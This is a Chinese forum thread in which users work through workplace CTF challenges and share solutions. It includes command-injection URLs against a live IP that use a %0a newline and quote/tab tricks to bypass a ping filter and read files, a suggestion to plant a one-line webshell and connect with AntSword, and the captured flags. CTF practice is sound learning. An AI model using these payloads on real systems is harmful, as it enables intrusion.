来看看单位发布的CTF题目
本帖最后由 975556036 于 2024-4-20 23:23 编辑单位安全部门发布的CTF题目,让大家学习相关视频后出的考题,思路只有一点点,大家一起试试。
原题目已更新,
1.题目描述:命令执行
http://218.94.126.122:35432
尝试扫描发现目录robots.txt,内容有段文字/1af3223f1176293c.php?。
访问后出现ping功能,后面可以追加%a,其他|,||,&,&&,空格,运算符等都不行。
追加后http://218.94.126.122:35432/1af3223f1176293c.php?ip=127.0.0.1%0als,出现如图,后面指点下。
本帖最后由 cattie 于 2024-4-20 09:36 编辑
1、
这个网站过滤一般的通配符("&|;"之类的,用%0a绕过)
http://218.94.126.122:35447/1af3223f1176293c.php?ip=127.0.0.1%0als
目录:
http://218.94.126.122:35447/1af3223f1176293c.php?ip=127.0.0.1%0aca%27%27t%09*.php
康康你的php文件(果然过滤了)
shell.php里面有一个这个:
用post请求注入就可以拿到shell权限了(现在只返回tt了,估计修改了)
2、
flag{300FD72D94299CF3B208E3F7B8973F7D}
3、源码就是"www.rar",下载以后那个robots.txt里面的就是flag
base64解码
flag{9B69EA6B9A4A85A9}
本帖最后由 cattie 于 2024-4-21 10:52 编辑
zsm880216 发表于 2024-4-20 13:12
第一题我进去没有shell.php文件了,应该怎么操作呀
题目应该换过了,第一题自己看看吧
还是一样的,不用shell直接访问这个也行。
http://218.94.126.122:35432/1af3223f1176293c.php?ip=127.0.0.1%0aca%27%27t%09/flagflag{F1B5284149D5D194D4BCD126FEA94684}
第一题:好像是个ping内容,扫描出现robots.txt,内容有又出现php,http://218.94.126.122:35447/1af3223f1176293c.php,是个ip=,出现ping127.0.0.1,尝试添加各种管道符都不会成功或者无响应。
第二题:完全没有思路
第三题:扫描有个/www.rar。解压出来有个flag,然后就不知道了 cattie 发表于 2024-4-19 21:42
1、
"flag{OUI2OUVBNkI5QTRBODVBOQ==}“
还得再base64解一下
本帖最后由 2205 于 2024-4-19 23:36 编辑
看一下CPU是啥。。价值:8元(包邮)
第一个题是flag{F1B5284149D5D194D4BCD126FEA94684}
php过滤了很多符号,但shell权限很大,把过滤的部分删除,生成一句马,然后就可以蚁剑。 啥类型单位啊?好奇 看了第二题,挺有意思的,哈哈 cattie 发表于 2024-4-19 21:42
1、
这个网站过滤一般的通配符("&|;"之类的,用%0a绕过)
第一题我进去没有shell.php文件了,应该怎么操作呀 flag{F1B5284149D5D194D4BCD126FEA94684}
flag{300FD72D94299CF3B208E3F7B8973F7D}
第三题 ip端口怎么和第一个一样啊,扫了下备份也没东西
页:
[1]
2